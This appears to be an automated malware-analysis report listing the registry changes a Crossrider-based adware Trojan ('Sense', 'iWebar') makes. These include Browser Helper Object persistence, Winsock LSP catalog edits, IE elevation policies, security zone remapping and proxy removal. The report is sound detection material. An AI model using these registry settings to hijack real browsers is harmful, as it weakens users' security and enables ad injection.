    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\ProgID]
    "(Default)" = "CrossriderApp0048292.BHO.1"

    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
    "(Default)" = ""

    [HKCR\TypeLib\{44444444-4444-4444-4444-440444824492}\1.0\HELPDIR]
    "(Default)" = "%Program Files%\Sense"

    [HKCR\TypeLib\{44444444-4444-4444-4444-440444824492}\1.0]
    "(Default)" = "CrossriderApp0048292 Type Library"

    [HKCR\CLSID\{22222222-2222-2222-2222-220422822292}\InprocServer32]
    "(Default)" = "%Program Files%\Sense\Sense-bho.dll"

    [HKCR\Interface\{55555555-5555-5555-5555-550455825592}\TypeLib]
    "Version" = "1.0"

    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\VersionIndependentProgID]
    "(Default)" = "CrossriderApp0048292"

    [HKCR\TypeLib\{44444444-4444-4444-4444-440444824492}\1.0\FLAGS]
    "(Default)" = "0"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "43 5C 9C 04 20 2E 3B 8A 79 92 E1 1C AD 2F C2 63"

    [HKCR\Interface\{55555555-5555-5555-5555-550455825592}\ProxyStubClsid32]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\TypeLib]
    "(Default)" = "{44444444-4444-4444-4444-440444824492}"

    [HKCR\CrossriderApp0048292.Sandbox.1\CLSID]
    "(Default)" = "{22222222-2222-2222-2222-220422822292}"

    [HKCR\Interface\{66666666-6666-6666-6666-660466826692}\ProxyStubClsid]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\CrossriderApp0048292.BHO\CLSID]
    "(Default)" = "{11111111-1111-1111-1111-110411821192}"

    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}]
    "(Default)" = "Sense"

    [HKCR\Interface\{66666666-6666-6666-6666-660466826692}\TypeLib]
    "(Default)" = "{44444444-4444-4444-4444-440444824492}"

    [HKCR\Interface\{55555555-5555-5555-5555-550455825592}]
    "(Default)" = "ICrossriderBHO"

    [HKCR\CLSID\{22222222-2222-2222-2222-220422822292}\InprocServer32]
    "ThreadingModel" = "Apartment"

    [HKCR\Interface\{66666666-6666-6666-6666-660466826692}]
    "(Default)" = "ISandBox"

    It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110411821192}]
    "(Default)" = "CrossriderApp0048292"

    "NoExplorer" = "1"

    The Trojan deletes the following registry key(s):

    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\Implemented Categories]
    [HKCR\CLSID\{22222222-2222-2222-2222-220422822292}\VersionIndependentProgID]
    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110411821192}]
    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\Programmable]
    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\TypeLib]
    [HKCR\CLSID\{22222222-2222-2222-2222-220422822292}\InprocServer32]
    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\ProgID]
    [HKCR\CLSID\{22222222-2222-2222-2222-220422822292}\TypeLib]
    [HKCR\CLSID\{22222222-2222-2222-2222-220422822292}]
    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\VersionIndependentProgID]
    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}]
    [HKCR\CLSID\{22222222-2222-2222-2222-220422822292}\Programmable]
    [HKCR\CLSID\{11111111-1111-1111-1111-110411821192}\InprocServer32]
    [HKCR\CLSID\{22222222-2222-2222-2222-220422822292}\ProgID]

    The process regsvr32.exe:3004 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCR\TypeLib\{44444444-4444-4444-4444-440344554410}\1.0\HELPDIR]
    "(Default)" = "%Program Files%\iWebar"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\ProgID]
    "(Default)" = "CrossriderApp0035510.BHO.1"

    [HKCR\CLSID\{22222222-2222-2222-2222-220322552210}\ProgID]
    "(Default)" = "CrossriderApp0035510.Sandbox.1"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\VersionIndependentProgID]
    "(Default)" = "CrossriderApp0035510"

    [HKCR\CrossriderApp0035510.Sandbox]
    "(Default)" = "CrossriderApp0035510.Sandbox"

    [HKCR\CrossriderApp0035510.Sandbox\CurVer]
    "(Default)" = "CrossriderApp0035510.Sandbox"

    [HKCR\TypeLib\{44444444-4444-4444-4444-440344554410}\1.0]
    "(Default)" = "CrossriderApp0035510 Type Library"

    [HKCR\Interface\{66666666-6666-6666-6666-660366556610}]
    "(Default)" = "ISandBox"

    [HKCR\Interface\{55555555-5555-5555-5555-550355555510}\TypeLib]
    "Version" = "1.0"

    [HKCR\TypeLib\{44444444-4444-4444-4444-440344554410}\1.0\FLAGS]
    "(Default)" = "0"

    [HKCR\Interface\{55555555-5555-5555-5555-550355555510}\TypeLib]
    "(Default)" = "{44444444-4444-4444-4444-440344554410}"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}]
    "(Default)" = "iWebar"

    [HKCR\CrossriderApp0035510.BHO.1]
    "(Default)" = "CrossriderApp0035510"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\TypeLib]
    "(Default)" = "{44444444-4444-4444-4444-440344554410}"

    [HKCR\CrossriderApp0035510.BHO.1\CLSID]
    "(Default)" = "{11111111-1111-1111-1111-110311551110}"

    [HKCR\Interface\{55555555-5555-5555-5555-550355555510}]
    "(Default)" = "ICrossriderBHO"

    [HKCR\Interface\{66666666-6666-6666-6666-660366556610}\ProxyStubClsid32]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\CrossriderApp0035510.BHO\CurVer]
    "(Default)" = "CrossriderApp0035510"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\InprocServer32]
    "(Default)" = "%Program Files%\iWebar\iWebar-bho.dll"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
    "(Default)" = ""

    [HKCR\CrossriderApp0035510.Sandbox.1]
    "(Default)" = "CrossriderApp0035510.Sandbox"

    [HKCR\Interface\{66666666-6666-6666-6666-660366556610}\TypeLib]
    "Version" = "1.0"

    [HKCR\CrossriderApp0035510.Sandbox\CLSID]
    "(Default)" = "{22222222-2222-2222-2222-220322552210}"

    [HKCR\Interface\{66666666-6666-6666-6666-660366556610}\TypeLib]
    "(Default)" = "{44444444-4444-4444-4444-440344554410}"

    [HKCR\CLSID\{22222222-2222-2222-2222-220322552210}\VersionIndependentProgID]
    "(Default)" = "CrossriderApp0035510.Sandbox"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\Implemented Categories]
    "(Default)" = ""

    [HKCR\TypeLib\{44444444-4444-4444-4444-440344554410}\1.0\0\win32]
    "(Default)" = "%Program Files%\iWebar\iWebar-bho.dll"

    [HKCR\CLSID\{22222222-2222-2222-2222-220322552210}]
    "(Default)" = "CrossriderApp0035510.Sandbox"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "F3 33 BD D1 FD F2 24 70 D3 68 E3 47 64 5C DA 64"

    [HKCR\Interface\{55555555-5555-5555-5555-550355555510}\ProxyStubClsid32]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\InprocServer32]
    "ThreadingModel" = "Apartment"

    [HKCR\CrossriderApp0035510.BHO\CLSID]
    "(Default)" = "{11111111-1111-1111-1111-110311551110}"

    [HKCR\Interface\{66666666-6666-6666-6666-660366556610}\ProxyStubClsid]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\CrossriderApp0035510.Sandbox.1\CLSID]
    "(Default)" = "{22222222-2222-2222-2222-220322552210}"

    [HKCR\CLSID\{22222222-2222-2222-2222-220322552210}\InprocServer32]
    "(Default)" = "%Program Files%\iWebar\iWebar-bho.dll"
    "ThreadingModel" = "Apartment"

    [HKCR\Interface\{55555555-5555-5555-5555-550355555510}\ProxyStubClsid]
    "(Default)" = "{00020424-0000-0000-C000-000000000046}"

    [HKCR\CrossriderApp0035510.BHO]
    "(Default)" = "CrossriderApp0035510"

    [HKCR\CLSID\{22222222-2222-2222-2222-220322552210}\TypeLib]
    "(Default)" = "{44444444-4444-4444-4444-440344554410}"

    It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311551110}]
    "NoExplorer" = "1"

    "(Default)" = "CrossriderApp0035510"

    The Trojan deletes the following registry key(s):

    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}]
    [HKCR\CLSID\{22222222-2222-2222-2222-220322552210}\Programmable]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\Programmable]
    [HKCR\CLSID\{22222222-2222-2222-2222-220322552210}\VersionIndependentProgID]
    [HKCR\CLSID\{22222222-2222-2222-2222-220322552210}\InprocServer32]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\ProgID]
    [HKCR\CLSID\{22222222-2222-2222-2222-220322552210}]
    [HKCR\CLSID\{22222222-2222-2222-2222-220322552210}\TypeLib]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\TypeLib]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\VersionIndependentProgID]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\InprocServer32]
    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311551110}]
    [HKCR\CLSID\{22222222-2222-2222-2222-220322552210}\ProgID]
    [HKCR\CLSID\{11111111-1111-1111-1111-110311551110}\Implemented Categories]

    The process sense-buttonutil.exe:3896 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "B0 C8 3F 10 1A BA E0 ED E5 CD C0 7E DA BC E8 CC"

    [HKCU\Software\Sense\Log]
    "sense-buttonutil" = "0"

    The process ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.exe:2904 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "3A D2 F3 1D D4 EB 7A 75 F5 46 B1 67 F2 30 DB 06"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F243CFA2-A72C-41BE-A4D9-DF4ECFC434}]
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD27DC93-6BF3-4408-968A-31D23FB23C7}]
    "AppPath" = "%Program Files%\Sense"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A044A426-AC09-4E2F-BF2D-79A75D7123BD}]
    "AppPath" = "%Program Files%\Sense"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{42AE830A-B24D-4246-8BB4-EEC512FCD93}]
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD27DC93-6BF3-4408-968A-31D23FB23C7}]
    "AppName" = "ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.exe-codedownloader.exe"

    [HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
    "{11111111-1111-1111-1111-110411821192}" = ""

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{42AE830A-B24D-4246-8BB4-EEC512FCD93}]
    "AppPath" = "%Program Files%\Sense"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD27DC93-6BF3-4408-968A-31D23FB23C7}]
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F243CFA2-A72C-41BE-A4D9-DF4ECFC434}]
    "AppPath" = "%Program Files%\Sense"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
    "{11111111-1111-1111-1111-110411821192}" = "1"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A044A426-AC09-4E2F-BF2D-79A75D7123BD}]
    "AppName" = "ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.exe-buttonutil.exe"
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{42AE830A-B24D-4246-8BB4-EEC512FCD93}]
    "AppName" = "ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.exe-helper.exe"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F243CFA2-A72C-41BE-A4D9-DF4ECFC434}]
    "AppName" = "ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.exe-buttonutil64.exe"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
    "Timestamp"

    The process Sense-bg.exe:2568 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "9D DB F2 AD B2 0F 31 CF DA 02 85 29 D0 28 57 DF"

    The process lspinst.exe:2404 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "29 2B 80 83 FE CF 70 7A 67 D6 0F 7C 7B D6 27 CA"

    [HKLM\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
    "TrapPollTimeMilliSecs" = "15000"

    [HKLM\SOFTWARE\Licenses]
    "{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 3A A5 44 A3"
    "{I3B3ED09D712B0615}" = "0E 00 00 00"

    The process lspinst.exe:2656 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
    "Num_Catalog_Entries" = "14"

    [HKLM\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
    "TrapPollTimeMilliSecs" = "15000"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
    "PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
    "PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
    "PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
    "PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
    "PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
    "PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
    "PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
    "Next_Catalog_Entry_ID" = "1021"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
    "PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

    [HKLM\SOFTWARE\Licenses]
    "{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 3A A5 44 A3"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
    "PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
    "PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
    "PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "20 72 7C EC 6A 67 C2 C2 BE E8 8E FB 3A A4 0D D3"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
    "PackedCatalogItem" = "43 3A 5C 50 72 6F 67 72 61 6D 20 46 69 6C 65 73"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
    "PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
    "Serial_Access_Num" = "12"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
    "PackedCatalogItem" = "43 3A 5C 50 72 6F 67 72 61 6D 20 46 69 6C 65 73"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
    "PackedCatalogItem" = "43 3A 5C 50 72 6F 67 72 61 6D 20 46 69 6C 65 73"

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
    "PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

    [HKLM\SOFTWARE\Licenses]
    "{I3B3ED09D712B0615}" = "11 00 00 00"

    The Trojan deletes the following registry key(s):

    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000000C]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000000B]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000000E]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000000D]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
    [HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]

    The process ca91e4a6-ab07-4dc2-9156-7c7e5962e962-3.exe:2460 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "02 F5 9F 12 A7 7B 7C BD 19 F9 A0 63 52 2F 66 F8"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

    The process wscript.exe:3432 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "DC 74 57 FB 80 02 52 E1 2E 9E 60 A3 58 94 6A A6"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Common Files\Goobzo\GBUpdate]
    "smu.exe" = "Search Module Update Service"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "ProxyBypass" = "1"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    "IntranetName" = "1"

    The process dwwin.exe:2388 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "A7 27 1F 85 BB 3C 1F 69 D7 33 74 CB 49 DE 9A DB"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 30 00 00 00 01 00 00 00 00 00 00 00"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Personal" = "%Documents and Settings%\%current user%\My Documents"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process object browser-buttonutil.exe:3908 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "35 B0 A3 27 FC 0D 85 73 62 54 E3 BF 10 CF 18 48"

    [HKCU\Software\Object Browser\Log]
    "object browser-buttonutil" = "0"

    The process iWebar-bg.exe:3248 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "0F 52 1C 91 D0 94 45 45 A3 EB DF DA AE E4 4C A8"

    The process ca91e4a6-ab07-4dc2-9156-7c7e5962e962-4.exe:2720 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "EA 9C 22 A0 D6 E6 9C 1A 90 52 DC 04 F0 EB 57 2E"

    The process sense-bg.exe:1088 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_plugins_version_]
    "Expiration" = "1717268198"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_override_verticals]
    "Value" = "{}"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Sense\Db\Internal\Resources_queue]
    "Value" = "{}"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_stats_]
    "Expiration" = "1717268197"

    [HKCU\Software\Sense\Db\Internal\monitor.onRequest]
    "Value" = "false"

    [HKCU\Software\Crossrider\onBeforeNavigate]
    "48292" = ""

    [HKCU\Software\Sense\Db\Internal\monetization_plugin_notBundledArr_]
    "Value" = "[]"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\Sense\Db\Internal\Resources_nextCheck]
    "Value" = "true"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 2F 00 00 00 01 00 00 00 00 00 00 00"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060420140605]
    "CacheLimit" = "8192"

    [HKCU\Software\Sense\background]
    "__onDocumentStart_script__" = ""

